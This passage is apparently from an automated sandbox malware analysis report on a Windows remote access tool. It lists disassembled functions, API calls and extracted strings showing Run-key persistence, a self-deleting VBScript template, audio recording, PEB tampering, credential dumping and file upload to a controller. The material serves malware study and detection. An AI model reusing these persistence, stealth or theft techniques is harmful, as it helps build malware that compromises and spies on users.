                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                          • Part of subcall function 0041B59F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6B5,00000000,00000000,?), ref: 0041B5DE
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                        • ExitProcess.KERNEL32 ref: 0040C63E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                        • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 1861856835-3168347843
                                        • Opcode ID: d104b75ca01019766e4c18ed666eb39b745631fe35c064e3107e8b6117f1f402
                                        • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                                        • Opcode Fuzzy Hash: d104b75ca01019766e4c18ed666eb39b745631fe35c064e3107e8b6117f1f402
                                        • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                                        Function 0041A1CB Relevance: 42.2, APIs: 12, Strings: 12, Instructions: 180synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                        • SetEvent.KERNEL32 ref: 0041A39A
                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                        • CloseHandle.KERNEL32 ref: 0041A3BB
                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                        • String ID: alias audio$" type $TUF$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                        • API String ID: 738084811-2745919808
                                        • Opcode ID: 366dc257e76a7d89ff517ca85c94e996c3be762cdb00e461543f6a6bce535d75
                                        • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                        • Opcode Fuzzy Hash: 366dc257e76a7d89ff517ca85c94e996c3be762cdb00e461543f6a6bce535d75
                                        • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                        Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                        • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                        • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                        • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Write$Create
                                        • String ID: RIFF$WAVE$data$fmt
                                        • API String ID: 1602526932-4212202414
                                        • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                        • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                        • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                        • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                        Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe,00000001,004068B2,C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                        • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                        • API String ID: 1646373207-982034807
                                        • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                        • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                        • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                        • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                        Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 0040BC75
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                        • _wcslen.LIBCMT ref: 0040BD54
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe,00000000,00000000), ref: 0040BDF2
                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                        • _wcslen.LIBCMT ref: 0040BE34
                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                        • ExitProcess.KERNEL32 ref: 0040BED0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                        • String ID: 6$C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$del$open$BG$BG
                                        • API String ID: 1579085052-151350935
                                        • Opcode ID: 4d244095d4847cbae713d45db5f80276bba3783f73a4fe09937fc6169b27dde8
                                        • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                                        • Opcode Fuzzy Hash: 4d244095d4847cbae713d45db5f80276bba3783f73a4fe09937fc6169b27dde8
                                        • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                                        Function 0041B1CB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?), ref: 0041B1E6
                                        • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                                        • lstrlenW.KERNEL32(?), ref: 0041B217
                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                                        • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                                        • _wcslen.LIBCMT ref: 0041B2EB
                                        • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                        • GetLastError.KERNEL32 ref: 0041B323
                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                        • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                        • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                        • GetLastError.KERNEL32 ref: 0041B380
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                        • String ID: ?
                                        • API String ID: 3941738427-1684325040
                                        • Opcode ID: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
                                        • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                        • Opcode Fuzzy Hash: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
                                        • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                        Function 0044E21E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$EnvironmentVariable$_wcschr
                                        • String ID:
                                        • API String ID: 3899193279-0
                                        • Opcode ID: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                        • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                        • Opcode Fuzzy Hash: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                        • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                        Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                          • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                        • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                        • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                        • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                        • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                        • Sleep.KERNEL32(00000064), ref: 00412060
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                        • String ID: /stext "$HDG$HDG$>G$>G
                                        • API String ID: 1223786279-3931108886
                                        • Opcode ID: dd84fb7e7cdabf2e47e208a23127d8f86efb5b2e25be2ef0fbb16d0b89917122
                                        • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                        • Opcode Fuzzy Hash: dd84fb7e7cdabf2e47e208a23127d8f86efb5b2e25be2ef0fbb16d0b89917122
                                        • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
                                        Function 0041CAAE Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                                        • GetCursorPos.USER32(?), ref: 0041CB08
                                        • SetForegroundWindow.USER32(?), ref: 0041CB11
                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                                        • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                                        • ExitProcess.KERNEL32 ref: 0041CB84
                                        • CreatePopupMenu.USER32 ref: 0041CB8A
                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                        • String ID: Close
                                        • API String ID: 1657328048-3535843008
                                        • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                        • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                                        • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                        • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                        Function 00444F4D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$Info
                                        • String ID:
                                        • API String ID: 2509303402-0
                                        • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                        • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                        • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                        • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                        Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                        • __aulldiv.LIBCMT ref: 00407FE9
                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                        • CloseHandle.KERNEL32(00000000), ref: 00408200
                                        • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                        • CloseHandle.KERNEL32(00000000), ref: 00408256
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                        • API String ID: 1884690901-3066803209
                                        • Opcode ID: b4bf83234e7876ad0386de0079e022938b9164f4f2de2980decd81bcee1f3e40
                                        • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                        • Opcode Fuzzy Hash: b4bf83234e7876ad0386de0079e022938b9164f4f2de2980decd81bcee1f3e40
                                        • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                        Function 00413E37 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                        • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                        • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                        • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                        • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                        • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
